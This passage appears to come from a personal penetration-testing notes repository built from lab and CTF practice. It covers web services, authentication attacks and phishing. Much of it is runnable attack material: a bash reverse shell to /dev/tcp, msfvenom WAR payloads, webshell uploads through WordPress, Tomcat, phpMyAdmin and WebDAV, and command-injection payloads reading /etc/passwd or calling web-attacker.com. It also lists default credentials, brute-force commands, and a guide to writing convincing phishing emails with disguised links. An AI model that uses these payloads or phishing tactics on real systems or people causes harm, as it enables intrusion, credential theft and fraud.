http://192.168.212.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 0 165 | 166 | ``` 167 | 168 | ## Web Vulnerabilities 169 | 170 | LINK TO WEB VULNS..... 171 | 172 | ### Server Side 173 | 174 | [SQL Injection](../../pentesting-web/sqli-sql-injection.md) 175 | 176 | [Authentication](../../pentesting-web/authentication.md) 177 | 178 | [Directory Traversal](../../pentesting-web/directory-traversal.md) 179 | 180 | [Command Injection](../../pentesting-web/command-injection/) 181 | 182 | [File Upload Vulnerabilities](../../pentesting-web/unrestricted-file-upload.md) 183 | 184 | Server-Side Request Forgery (SSRF) 185 | 186 | [XXE Injection](../../pentesting-web/xxe-xml-external-entity.md) 187 | 188 | ### Client Side 189 | 190 | [Cross-Site Scripting (XSS)](../../pentesting-web/xss-cross-site-scripting/) 191 | 192 | Cross-Site Request Forgery (CSRF) 193 | 194 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/drupal.md: -------------------------------------------------------------------------------- 1 | # Drupal 2 | 3 | ## Scanning 4 | 5 | ### drupwn 6 | 7 | ```bash 8 | drupwn enum http:// 9 | ``` 10 | 11 | ### droopescan 12 | 13 | ```bash 14 | droopescan scan -u http:// 15 | ``` 16 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/joomla.md: -------------------------------------------------------------------------------- 1 | # Joomla 2 | 3 | ## Interesting Files 4 | 5 | * /administrator 6 | * /administrator/manifests/files/joomla.xml 7 | * /language/en-GB/en-GB.xml 8 | 9 | ## Scanning 10 | 11 | ### joomscan 12 | 13 | ```bash 14 | perl joomscan.pl -u 15 | ``` 16 | 17 | ## Exploitation 18 | 19 | ### Templates 20 | 21 | View template, Copy template and rename, select newly created template, modify index.php file with PHP reverse shell code, Save. Start netcat listener and navigate to the new template /templates/shelly 22 | 23 | After getting on the filesystem look at the web directory. 24 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/node.js.md: -------------------------------------------------------------------------------- 1 | # Node.js 2 | 3 | ## Exploitation 4 | 5 | ### Eval RCE 6 | 7 | 1. Intercept request 8 | 1. Test parameters for URL/base64 encoding 9 | 2. Test parameters for arithmetic evaluation i.e. 1+1 and see if the response contains 2. 10 | 11 | Example: Dibble on Proving Grounds 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/phpmyadmin.md: -------------------------------------------------------------------------------- 1 | # phpMyAdmin 2 | 3 | ## Enumeration 4 | 5 | Default credentials: `root:` 6 | 7 | 8 | 9 | ## Exploitation 10 | 11 | ### Web Shell 12 | 13 | 1. Identify the web server path: Ex: Wamp server is C:/wamp/www/ 14 | 2. Create web shell file via SQL query in phpMyAdmin 15 | 1. `select "" into outfile "C:/wamp/www/shell.php"` 16 | 3. Navigate to the path of the uploaded shell and execute a command: 17 | 1. http://\/shell.php?cmd=whoami 18 | 4. And if successful, command execution is available. 19 | 20 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/tomcat.md: -------------------------------------------------------------------------------- 1 | # Tomcat 2 | 3 | 4 | 5 | ## Exploitation Checks 6 | 7 | * Open Tomcat Manager 8 | * Check to see if any of the default credentials will work to log in. Common ones: 9 | * `admin:admin` 10 | * `tomcat:tomcat` 11 | * `admin:` 12 | * `admin:s3cr3t` 13 | * `tomcat:s3cr3t` 14 | * `admin:tomcat` 15 | * If so, we may be able to upload a war file to get a reverse shell. 16 | * After upload and deploying the war file, we can start a `netcat` listener, then select the war file from the Application Path column in Tomcat. 17 | * Open Tomcat Administration 18 | * Check to see if any of the default credentials will work to log in. 19 | * Check **/manager/status** path to look for version details and then known exploits especially if you cannot access **/manager/html**. 20 | 21 | ### MSFvenom Reverse Shell 22 | 23 | ```bash 24 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shellw.war 25 | ``` 26 | 27 | ### Metasploit 28 | 29 | ```bash 30 | use exploit/multi/http/tomcat_mgr_upload 31 | msf exploit(multi/http/tomcat_mgr_upload) > set rhost 32 | msf exploit(multi/http/tomcat_mgr_upload) > set rport 33 | msf exploit(multi/http/tomcat_mgr_upload) > set httpusername 34 | msf exploit(multi/http/tomcat_mgr_upload) > set httppassword 35 | msf exploit(multi/http/tomcat_mgr_upload) > exploit 36 | ``` 37 | 38 | ## Brute Force 39 | 40 | ### Hydra 41 | 42 | ```bash 43 | hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html 44 | ``` 45 | 46 | ### Metasploit 47 | 48 | ```bash 49 | msf> use auxiliary/scanner/http/tomcat_mgr_login 50 | ``` 51 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/webdav.md: -------------------------------------------------------------------------------- 1 | # WebDAV 2 | 3 | ## Scanning 4 | 5 | ### nmap 6 | 7 | ```bash 8 | nmap --script=http-webdav-scan,http-iis-webdav-vuln 9 | # Check for the HTTP Methods especially for PUT 10 | ``` 11 | 12 | ### cadaver 13 | 14 | ```bash 15 | cadaver 16 | dav:/> put /usr/share/webshells/aspx/cmdasp.aspx awen.txt # Example uploading shell 17 | dav:/> mv awen.txt awen.aspx # Change the file type of the uploaded file 18 | # Navigate to the awen.aspx file in the browser 19 | ``` 20 | 21 | ```bash 22 | kali@kali:~/Documents/offsec/oscp/proving_grounds/Hutch$ cadaver 192.168.71.122 23 | Authentication required for 192.168.71.122 on server `192.168.71.122': 24 | Username: 25 | Password: 26 | dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx 27 | Uploading /usr/share/webshells/aspx/cmdasp.aspx to `/cmdasp.aspx': 28 | Progress: [=============================>] 100.0% of 1400 bytes succeeded. 29 | # Navigate to the cmdasp.aspx file in the browser 30 | # Can then create a reverse shell payload with msfvenom, upload that using dav, 31 | # then call it from the cmdasp.aspx page using the full path 32 | ``` 33 | 34 | ### davtest 35 | 36 | ```bash 37 | davtest --url http:// 38 | davtest -move -sendbd auto -url http://:8080/webdav/ 39 | ``` 40 | 41 | ### 42 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/wordpress.md: -------------------------------------------------------------------------------- 1 | # WordPress 2 | 3 | ## Enumeration 4 | 5 | ### Interesting Files 6 | 7 | * wp-content 8 | * wp-content/plugins 9 | * Check this directory even if `wpscan` doesn't identify any installed plugin 10 | * May not work though - check sources code of blog pages 11 | * wp-admin 12 | * wp-config.php 13 | * wp-trackback.php 14 | * wp-login.php 15 | 16 | ``` 17 | -rwxr-xr-x 1 www-data www-data 405 Feb 6 2020 index.php 18 | -rwxr-xr-x 1 www-data www-data 19915 Jan 1 2021 license.txt 19 | -rwxr-xr-x 1 www-data www-data 7346 Sep 30 00:41 readme.html 20 | -rwxr-xr-x 1 www-data www-data 7165 Jan 21 2021 wp-activate.php 21 | drwxr-xr-x 9 www-data www-data 4096 Nov 10 14:18 wp-admin 22 | -rwxr-xr-x 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php 23 | -rwxr-xr-x 1 www-data www-data 2328 Feb 17 2021 wp-comments-post.php 24 | -rwxr-xr-x 1 www-data www-data 3769 Nov 8 17:01 wp-config.php 25 | drwxr-xr-x 6 www-data www-data 4096 Feb 9 22:51 wp-content 26 | -rwxr-xr-x 1 www-data www-data 3939 Jul 30 2020 wp-cron.php 27 | drwxr-xr-x 25 www-data www-data 16384 Nov 10 14:18 wp-includes 28 | -rwxr-xr-x 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php 29 | -rwxr-xr-x 1 www-data www-data 3900 May 15 2021 wp-load.php 30 | -rwxr-xr-x 1 www-data www-data 45463 Apr 6 2021 wp-login.php 31 | -rwxr-xr-x 1 www-data www-data 8509 Apr 14 2020 wp-mail.php 32 | -rwxr-xr-x 1 www-data www-data 22297 Jun 1 2021 wp-settings.php 33 | -rwxr-xr-x 1 www-data www-data 31693 May 7 2021 wp-signup.php 34 | -rwxr-xr-x 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php 35 | -rwxr-xr-x 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php 36 | ``` 37 | 38 | ### Scanning 39 | 40 | #### nmap 41 | 42 | ```bash 43 | nmap -sV --script=http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users -p80 44 | 45 | ``` 46 | 47 | #### wpscan 48 | 49 | ```bash 50 | # Basic Scan 51 | wpscan --url http://10.10.248.119 -o wpscan.log 52 | # Enumerate vulnerable plugins, themes, and users 53 | wpscan --url http://10.10.248.119 -e vp,vt,u -o wpscan.log --api-token <> 54 | # Aggressive Mode 55 | wpscan --url http://10.10.192.249 -e vp --plugins-detection aggressive 56 | # Brute Forcing Login 57 | wpscan --url http://10.10.128.156 -U users.txt -P /usr/share/wordlists/rockyou.txt -vv 58 | ``` 59 | 60 | ## Exploitation 61 | 62 | ### Plugins 63 | 64 | * Can add modified WordPress plugin header to the top of the reverse shell file 65 | * Upload reverse shell plugin as a zip file 66 | 67 | #### Responsive Thumbnail Slider 68 | 69 | * Using 'php/webapps/37998.txt' we can follow the steps from within the file. 70 | * Responsive Thumbnail Slider --> Manage Images --> Add New 71 | * Create a file called shell.php.jpg with the below contents: 72 | * `` 73 | * With Burp Intercept on, upload the the file and send the request to Repeater 74 | * Modify the filename from shell.php.jpg to shell.php and send the modified request 75 | * Turn off Intercept and back on the web page it should show "New image added successfully" 76 | * There are two new entries of images (initial request and repeater request) 77 | * Clicking on the webshell entry bring us to a new page and gives the link to the image 78 | * Clicking the link brings us to the file and can now get command execution 79 | * By appending `?cmd=id` 80 | * Now to get a reverse shell by updating the payload value 81 | * `?cmd=/bin/bash -c "bash -i>& /dev/tcp//4444 0>&1"` 82 | * Note: It may have to be URL encoded 83 | 84 | ### Themes Templates 85 | 86 | #### 404.php 87 | 88 | * Edit the 404.php template to include a reverse shell payload 89 | * Appearance --> Theme Editor 90 | * Select 404 Template from the right side pane 91 | * Linux 92 | * Copy the contents of /usr/share/webshells/php/php-reverse-shell.php and replace the contents in the 404.php template 93 | * Update the attacker machine IP and port as necessary 94 | * Then click on the Update File button 95 | * Windows 96 | * Copy the contents of /usr/share/webshells/php/qsd-php-backdoor.php and replace the contents in the 404.php template 97 | * Generate an msfvenom payload and upload it to a directory 98 | * Execute payload from main page calling the absolute path 99 | * Start a netcat listener 100 | * Try executing by visiting a page that doesn't exist 101 | * `http://demo.ine.local/i-dont-exist` 102 | * And a reverse shell connection is made 103 | * Try navigating to the 404.php file location 104 | * http://\/wordpress/404.php 105 | 106 | -------------------------------------------------------------------------------- /pentesting-network/873-rsync.md: -------------------------------------------------------------------------------- 1 | # 873 (rsync) 2 | 3 | ## Enumeration 4 | 5 | ### Banner 6 | 7 | #### nc 8 | 9 | ```bash 10 | nc -vn 873 11 | ``` 12 | 13 | ### Modules 14 | 15 | #### nmap 16 | 17 | ```bash 18 | sudo nmap -sV --script "rsync-list-modules" -p 873 19 | ``` 20 | 21 | #### Metasploit 22 | 23 | ```bash 24 | msf> use auxiliary/scanner/rsync/modules_list 25 | ``` 26 | 27 | ### rsync 28 | 29 | Unauthenticated 30 | 31 | ```bash 32 | rsync -av --list-only rsync://192.168.76.126/fox 33 | rsync -av rsync://192.168.76.126/fox ./rsync/ 34 | ``` 35 | 36 | Authenticated 37 | 38 | ```bash 39 | rsync -av --list-only rsync://username@192.168.0.123/fox 40 | rsync -av rsync://username@192.168.0.123:8730/fox ./rsync_shared 41 | ``` 42 | 43 | Upload a file (i.e. an authorized\_keys file to obtain access to a machine) 44 | 45 | ```bash 46 | mkdir .ssh 47 | ssh-keygen -f .ssh/fox-ssh -t ecdsa -b 521 48 | cp .ssh/fox-ssh.pub .ssh/authorized_keys 49 | rsync -av .ssh/ rsync://fox@192.168.76.126/fox/.ssh 50 | ``` 51 | 52 | ## Brute Force 53 | 54 | ```bash 55 | nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 56 | 57 | ``` 58 | 59 | -------------------------------------------------------------------------------- /pentesting-network/88-kerberos.md: -------------------------------------------------------------------------------- 1 | # 88 (Kerberos) 2 | 3 | ## Enumeration 4 | 5 | ### Authenticated 6 | 7 | #### Kerbrute 8 | 9 | ```bash 10 | /opt/kerbrute/kerbrute_linux_amd64 userenum --dc 10.10.86.5 -d lab.enterprise.thm /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -o users.txt 11 | /opt/kerbrute/kerbrute_linux_amd64 passwordspray --dc -d intelligence.htb users.txt 12 | ``` 13 | 14 | GetUserSPNs 15 | 16 | ``` 17 | kali@kali:~/ctf/tryhackme/enterprise$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.55.72 LAB.ENTERPRISE.THM/nik 18 | ``` 19 | -------------------------------------------------------------------------------- /pentesting-network/9200-9300-elasticsearch.md: -------------------------------------------------------------------------------- 1 | # 9200, 9300 (Elasticsearch) 2 | 3 | -------------------------------------------------------------------------------- /pentesting-web/authentication.md: -------------------------------------------------------------------------------- 1 | # Authentication 2 | 3 | ## PortSwigger 4 | 5 | [https://portswigger.net/web-security/authentication](https://portswigger.net/web-security/authentication) 6 | 7 | 8 | 9 | ## PortSwigger Labs 10 | 11 | ### Password-based login 12 | 13 | [https://portswigger.net/web-security/authentication/password-based](https://portswigger.net/web-security/authentication/password-based) 14 | 15 | #### Username enumeration via different responses (Apprentice) 16 | 17 | > This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password. To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page. 18 | 19 | * Navigated to Login page 20 | * Entered in generic credentials (test:test) 21 | * Error return "Invalid username" 22 | * We can determine a valid username by brute-forcing using a wordlist in Burp 23 | * Opened Burp 24 | 25 | #### Username enumeration via subtly different responses (Practitioner) 26 | 27 | #### Username enumeration via response timing (Practitioner) 28 | 29 | #### Broken brute-force protection, IP block (Practitioner) 30 | 31 | #### Username enumeration via account lock (Practitioner) 32 | 33 | #### Broken brute-force protection, multiple credentials per request (Expert) 34 | 35 | ### Multi-factor authentication 36 | 37 | [https://portswigger.net/web-security/authentication/multi-factor](https://portswigger.net/web-security/authentication/multi-factor) 38 | 39 | #### 2FA simple bypass (Apprentice) 40 | 41 | #### 2FA broken logic (Practitioner) 42 | 43 | #### 2FA bypass using a brute-force attack (Expert) 44 | 45 | ### Other Authentication Mechanisms 46 | 47 | [https://portswigger.net/web-security/authentication/other-mechanisms](https://portswigger.net/web-security/authentication/other-mechanisms) 48 | 49 | #### Password reset broken logic (Apprentice) 50 | 51 | #### Password reset poisoning via middleware (Practitioner) 52 | 53 | #### Password brute-force via password change (Practitioner) 54 | 55 | #### Brute-forcing a stay-logged-in cookie (Practitioner) 56 | 57 | #### Offline password cracking (Practitioner) 58 | 59 | -------------------------------------------------------------------------------- /pentesting-web/burp-suite.md: -------------------------------------------------------------------------------- 1 | # Burp Suite 2 | 3 | ## Burp Suite Certified Practitioner 4 | 5 | How to Prepare 6 | 7 | [https://portswigger.net/web-security/certification/how-to-prepare](https://portswigger.net/web-security/certification/how-to-prepare) 8 | 9 | Hints and Guidance 10 | 11 | [https://portswigger.net/web-security/certification/exam-hints-and-guidance](https://portswigger.net/web-security/certification/exam-hints-and-guidance) 12 | 13 | 14 | 15 | ## Server-side topics 16 | 17 | ### SQL Injection 18 | 19 | ### Authentication 20 | 21 | ### Path traversal 22 | 23 | ### Command injection 24 | 25 | ### Business logic vulnerabilities 26 | 27 | ### Information Disclosure 28 | 29 | ### Access control 30 | 31 | ### File upload vulnerabilities 32 | 33 | ### Race conditions 34 | 35 | ### Server-side request forgery (SSRF) 36 | 37 | ### XXE injection 38 | 39 | ### No SQL injection 40 | 41 | ### API Testing 42 | 43 | ### Web cache deception 44 | 45 | 46 | 47 | ## Client-side topics 48 | 49 | ### Cross-site scripting (XSS) 50 | 51 | ### Cross-site request forgery (CSRF) 52 | 53 | ### Cross-origin resource sharing (CORS) 54 | 55 | ### Clickjacking 56 | 57 | ### DOM-base vulnerabilities 58 | 59 | ### WebSockets 60 | 61 | ## Advanced topics 62 | 63 | ### Insecure deserialization 64 | 65 | ### Web LLM attacks 66 | 67 | ### GraphQL API vulnerabilities 68 | 69 | ### Server-side template injection 70 | 71 | ### Web cache poisoning 72 | 73 | ### HTTP Host header attacks 74 | 75 | ### HTTP request smuggling 76 | 77 | ### OAuth authentication 78 | 79 | ### JWT attacks 80 | 81 | ### Prototype pollution 82 | 83 | ### Essential skills 84 | 85 | 86 | 87 | -------------------------------------------------------------------------------- /pentesting-web/command-injection/README.md: -------------------------------------------------------------------------------- 1 | # Command Injection 2 | 3 | ### How to Find 4 | 5 | #### Black-Box Testing 6 | 7 | * Map the application (Using Burp) 8 | * Identify all instances where the web application appears to be interacting with the underlying operating system 9 | * Fuzz the application 10 | * Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`. 11 | * For in-band command injection, analyze the response of the application to determine if it's vulnerable. 12 | * For blind command injection, you need to get creative. 13 | * Trigger a time delay using the ping or sleep command. 14 | * Output the response of the command in the web root and retrieve the file directly using a browser. 15 | * Open an out-of-band channel back to a server you control. 16 | 17 | #### White-Box Testing 18 | 19 | * Perform a combination of black box and white-box testing 20 | * Map all input vectors in the application. 21 | * Review source code to determine if any of the input vectors are added as parameters to functions that execute system commands. 22 | 23 | ### How to Exploit 24 | 25 | #### In-band 26 | 27 | * Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`. 28 | * Concatenate another commands 29 | * `127.0.0.1 && cat /etc/passwd &` 30 | * `127.0.0.1 & cat /etc/passwd &` 31 | * `127.0.0.1 || cat /etc/passwd &` 32 | 33 | #### Blind 34 | 35 | * Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`. 36 | * Trigger a time delay. 37 | * `127.0.0.1 && sleep 10 &` 38 | * `127.0.0.1 ping -c 10 127.0.0.1 &` 39 | * Output the response of the command in the web root and retrieve the file directly using a browser 40 | * `127.0.0.1 & whoami > /var/www/static/whoami.txt &` 41 | * Open an out-of-band channel back to a server you control. 42 | * `127.0.0.1 & nslookup asdfjkl.web-attacker.com &` 43 | * ``127.0.0.1 & nslookup `whoami` .asdfjkl.web-attacker.com &`` 44 | 45 | ### Automate Exploitation Tools 46 | 47 | * Burp Suite 48 | * arachni 49 | * OWASP Zap 50 | * Wapiti 51 | * acunetix 52 | * w3af 53 | 54 | ### How to Prevent 55 | 56 | The most effective way to prevent OS command injection vulnerabilities is to never call out to OS commands from application-layer code. Instead, implement the required functionality using safer platform APIs. 57 | 58 | * For example: use `mkdir()` instead of `system("mkdir /dir_name")` 59 | 60 | If it is required to perform OS commands using user-supplied input, then strong input validation must be performed. 61 | 62 | * Validate against a whitelist of permitted values. 63 | * Validate that the input is as expected or valid input. 64 | 65 | -------------------------------------------------------------------------------- /pentesting-web/idor-insecure-direct-object-reference.md: -------------------------------------------------------------------------------- 1 | # IDOR (Insecure Direct Object Reference) 2 | 3 | ## IDOR 4 | 5 | [https://portswigger.net/web-security/access-control/idor](https://portswigger.net/web-security/access-control/idor) 6 | 7 | Insecure direct object references (IDOR) are a type of [access control](https://portswigger.net/web-security/access-control) vulnerability that arises when an application uses user-supplied input to access objects directly. 8 | 9 | ## Examples 10 | 11 | ### Database Objects 12 | 13 | Customer Number used directly as a record index in queries performed against a database. 14 | 15 | `https://insecure-website.com/customer_account?customer_number=132355` 16 | 17 | ### Static Files 18 | 19 | Text file on the server-side filesystem where an attacker can modify/increment filename. 20 | 21 | `https://insecure-website.com/static/12144.txt` 22 | 23 | ### User ID 24 | 25 | User ID value where an attacker could potentially change to view other user's information. 26 | 27 | `http://online-service.thm/profile?user_id=1305` 28 | 29 | ### User ID Address 30 | 31 | Typical request and response that we may be able to manipulate 32 | 33 | ```yaml 34 | https://example.com/api/user/167865/address 35 | 36 | Response: 37 | { 38 | "id":167865, 39 | "username":"nahamsec", 40 | "address":"1234 another street" 41 | } 42 | ``` 43 | 44 | Let's say we change the ID... 45 | 46 | ```yaml 47 | https://example.com/api/user/1/address 48 | 49 | Response: 50 | { 51 | "id":1, 52 | "username":"admin", 53 | "address":"1234 another street" 54 | } 55 | ``` 56 | 57 | May be able to access other user's resources.. 58 | 59 | ### User ID Profile 60 | 61 | Capture the PUT request for modifying/updating a user. 62 | 63 | ```yaml 64 | PUT https://example.com/api/user/profile HTTP/1.1 65 | 66 | { 67 | "id":167865, 68 | "username":"nahamsec", 69 | "address":"me@gmail.com" 70 | } 71 | 72 | Response: 73 | {"success":"true"} 74 | ``` 75 | 76 | If we know the ID for admin or other user we can try to override that user with a new one we create/own. 77 | 78 | ```yaml 79 | PUT https://example.com/api/user/profile HTTP/1.1 80 | 81 | { 82 | "id":1, 83 | "username":"nahamsec1", 84 | "address":"me+1@gmail.com" 85 | } 86 | 87 | Response: 88 | {"success":"true"} 89 | ``` 90 | 91 | ## Finding IDORs 92 | 93 | ### Encodings 94 | 95 | Check to see if any data being passed is encoded i.e. base64, then try to decode it. 96 | 97 | `eyJpZCI6MzB9` --> `{"id":30}` --> tamper --> `{"id":10}` --> encode --> `eyJpZCI6MTB9` --> Submit 98 | 99 | ### Hashes 100 | 101 | Check to see if any data being passed is hashed, try to identify the hash, then try to crack it. 102 | 103 | ### Unpredictable IDs 104 | 105 | If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them. If you can view the other users' content using their Id number while still being logged in with a different account (or not logged in at all), you've found a valid IDOR vulnerability. 106 | 107 | ### Locations 108 | 109 | The vulnerable endpoint you're targeting may not always be something you see in the address bar. It could be content your browser loads in via an AJAX request or something that you find referenced in a JavaScript file. 110 | 111 | Sometimes endpoints could have an unreferenced parameter that may have been of some use during development and got pushed to production. For example, you may notice a call to **/user/details** displaying your user information (authenticated through your session). But through an attack known as parameter mining, you discover a parameter called **user\_id** that you can use to display other users' information, for example, **/user/details?user\_id=123**. 112 | 113 | -------------------------------------------------------------------------------- /pentesting-web/jwt-attacks.md: -------------------------------------------------------------------------------- 1 | # JWT Attacks 2 | 3 | ## Exploiting JWT Flaws 4 | 5 | ### Check for Sensitive Data 6 | 7 | JWTs are just base64 encoded data that can be easily decode at: [https://jwt.io/](https://jwt.io/) 8 | 9 | Look for any sensitive or interesting information. 10 | 11 | ### Arbitrary Signature 12 | 13 | > If the code is using `jwt.verify` the secret key will need to be obtained (cracked) to use when attempting to send a modified payload data request. i.e. replacing username with admin. 14 | > 15 | > If the code is using `jwt.decode` the secret key will not be needed (or can be anything) so modifying the payload data request and resending it will work if otherwise valid 16 | 17 | If the code is using the Node.js library `jsonwebtoken` with the `jwt.decode` function above, the `alg` header value can be modified from `RS256` to `HS256` and then the payload values can attempted to be modified such as change a standard user to an admin user. 18 | 19 | ### No Signature 20 | 21 | Similar to the example above, the `alg` header value can be modified to be set to `none` and then the payload values can be attempted to be modified such as changing a standard user to an admin user 22 | 23 | ## Brute Forcing 24 | 25 | ### Cracking JWTs 26 | 27 | If the JWT secret key can be cracked, that key can be used to sign the token which allows payload values to be attempted to be modified such as changing a standard user to an admin user 28 | 29 | #### jwt\_tool 30 | 31 | [https://github.com/ticarpi/jwt\_tool](https://github.com/ticarpi/jwt\_tool) 32 | 33 | ```bash 34 | jwt_tool '' --crack -d /opt/jwt_tool/jwt-common.txt 35 | ``` 36 | 37 | #### hashcat 38 | 39 | ```bash 40 | # Dictionary attack 41 | hachcat -a 0 -m 16500 jwt.txt passlist.txt 42 | # Rule-based attack 43 | hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rul 44 | ``` 45 | 46 | ## PortSwigger Labs 47 | 48 | ### JWT authentication bypass via unverified signature 49 | 50 | * Logged in with standard credentials 51 | * Attempted to access /admin but got unauthorized 52 | * Intercepted the previous request, copied the JWT session cookie, and pasted it into jwt.io 53 | * Modified the `alg` header value from `RHS256` to `HS256` 54 | * Modified the `sub` payload value from wiener to `administrator` 55 | * Resent the request for /admin and successfully got access 56 | 57 | ### JWT authentication bypass via flawed signature verification 58 | 59 | * Logged in with standard credentials 60 | * Attempted to access /admin but got unauthorized 61 | * Intercepted the previous request and sent to Repeater 62 | * Highlighted the payload part in the request and modified that using Inspector to set the `sub` value to `administrator` 63 | * Highlighted the header part in the request and modified that using Inspector to set the `alg` value to `none` 64 | * Resent the request for /admin and successfully got access 65 | 66 | ### JWT authentication bypass via weak signing key 67 | 68 | * Logged in with standard credentials 69 | * Attempted to access /admin but got unauthorized 70 | * Intercepted the previous request and sent to Repeater 71 | * Copied the whole JWT session cookie and cracked the secret with hashcat 72 | * `hashcat -a 0 -m 16500 '' jwt.secrets.list` 73 | * Copied the whole JWT session cookie and placed it into jwt.io replacing the `sub` value of wiener to administrator and placing in the cracked secret into the Verify Signature section 74 | * Copied the whole encoded output of the above changes and placed it into the Cookie session of the intercepted request 75 | * Resent the request for /admin and successfully got access 76 | 77 | ## Appendix 78 | 79 | ### Resources 80 | 81 | [https://portswigger.net/web-security/jwt](https://portswigger.net/web-security/jwt) 82 | 83 | [https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) 84 | 85 | ### Other Tools 86 | 87 | [https://github.com/brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) 88 | 89 | [https://github.com/jmaxxz/jwtbrute](https://github.com/jmaxxz/jwtbrute) 90 | -------------------------------------------------------------------------------- /pentesting-web/nosql-injection.md: -------------------------------------------------------------------------------- 1 | # NoSQL Injection 2 | 3 | ## Example 4 | 5 | > Example using a login form for Admin Access with username and password 6 | 7 | * Intercept the login request with a basic username and password. 8 | * If the Content-Type and data are not in JSON form it will have to be converted: 9 | * Manually, changing Content-Type to `application/json` 10 | * Burp Extension 'Content Type Converter' 11 | * Then right click in the request, select Content Type Converter, and select JSON 12 | * May still need to modify the data to use JSON format, ex: 13 | * Before: `username=admin@admin.com&password=password&redirectPage=` 14 | * After: `{"username": "admin@admin.com", "password": "password"}` 15 | * Send the request to get some response 16 | * Example payloads below: 17 | 18 | ```bash 19 | # Grab user where username is admin@admin.com and the password that is not equal to blank 20 | {"username": "admin@admin.com", "password": {"$ne":""}} 21 | # and the password that has a value greater than an empty string 22 | {"username": "admin@admin.com", "password": {"$gt":""}} 23 | ``` 24 | 25 | ## Payloads 26 | 27 | [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection) 28 | 29 | -------------------------------------------------------------------------------- /pentesting-web/unrestricted-file-upload.md: -------------------------------------------------------------------------------- 1 | # Unrestricted File Upload 2 | 3 | ### Scenarios 4 | 5 | #### Blog comment where you can upload a photo 6 | 7 | Copy php-reverse-shell.php file and insert `GIF89a;` at the top of it: 8 | 9 | ```bash 10 | GIF89a; 11 | 60 | ``` 61 | 62 | Enumerate the output. 63 | 64 | ## Fingerprinting Web Servers 65 | 66 | ### HTTPRecon 67 | 68 | {% embed url="https://www.computec.ch/projekte/httprecon?s=download" %} 69 | 70 | ### NetSquare 71 | 72 | {% embed url="https://www.net-square.com/httprint.html" %} 73 | 74 | ### Uniscan 75 | 76 | ```bash 77 | uniscan -u 78 | ``` 79 | 80 | ## Web Server Penetration using SQLmap 81 | 82 | ```bash 83 | sqlmap -u https://admin-portal.europacorp.htb/ --forms --crawl=2 --dump 84 | ``` 85 | -------------------------------------------------------------------------------- /pentesting-web/xss-cross-site-scripting/README.md: -------------------------------------------------------------------------------- 1 | # XSS (Cross-Site Scripting) 2 | 3 | ## Finding 4 | 5 | ### Reflected 6 | 7 | ### Stored 8 | 9 | ### DOM-based 10 | 11 | ## Exploiting 12 | -------------------------------------------------------------------------------- /phishing/phishing-hiddeneye.md: -------------------------------------------------------------------------------- 1 | # Phishing: HiddenEye 2 | 3 | -------------------------------------------------------------------------------- /phishing/phishing.md: -------------------------------------------------------------------------------- 1 | # Phishing 2 | 3 | ## Writing Convincing Phishing Emails 4 | 5 | We have three things to work with regarding phishing emails: the sender's email address, the subject, and the content. 6 | 7 | **The Senders Address:** 8 | 9 | Ideally, the sender's address would be from a domain name that spoofs a significant brand, a known contact, or a coworker. See the Choosing A Phishing Domain task below for more information on this. 10 | 11 | To find what brands or people a victim interacts with, you can employ OSINT (Open Source Intelligence) tactics. For example: 12 | 13 | * Observe their social media account for any brands or friends they talk to. 14 | * Searching Google for the victim's name and rough location for any reviews the victim may have left about local businesses or brands. 15 | * Looking at the victim's business website to find suppliers. 16 | * Looking at LinkedIn to find coworkers of the victim. 17 | 18 | **The Subject:** 19 | 20 | You should set the subject to something quite urgent, worrying, or piques the victim's curiosity, so they do not ignore it and act on it quickly. 21 | 22 | Examples of this could be: 23 | 24 | 1. Your account has been compromised. 25 | 2. Your package has been dispatched/shipped. 26 | 3. Staff payroll information (do not forward!) 27 | 4. Your photos have been published. 28 | 29 | **The Content:** 30 | 31 | If impersonating a brand or supplier, it would be pertinent to research their standard email templates and branding (style, logo's images, signoffs etc.) and make your content look the same as theirs, so the victim doesn't expect anything. If impersonating a contact or coworker, it could be beneficial to contact them; first, they may have some branding in their template, have a particular email signature or even something small such as how they refer to themselves, for example, someone might have the name Dorothy and their email is dorothy@company.thm. Still, in their signature, it might say "Best Regards, Dot". Learning these somewhat small things can sometimes have quite dramatic psychological effects on the victim and convince them more to open and act on the email. 32 | 33 | If you've set up a spoof website to harvest data or distribute malware, the links to this should be disguised using the [**anchor text**](https://en.wikipedia.org/wiki/Anchor\_text) and changing it either to some text which says "Click Here" or changing it to a correct looking link that reflects the business you are spoofing, for example: 34 | 35 | `Click Here` 36 | 37 | 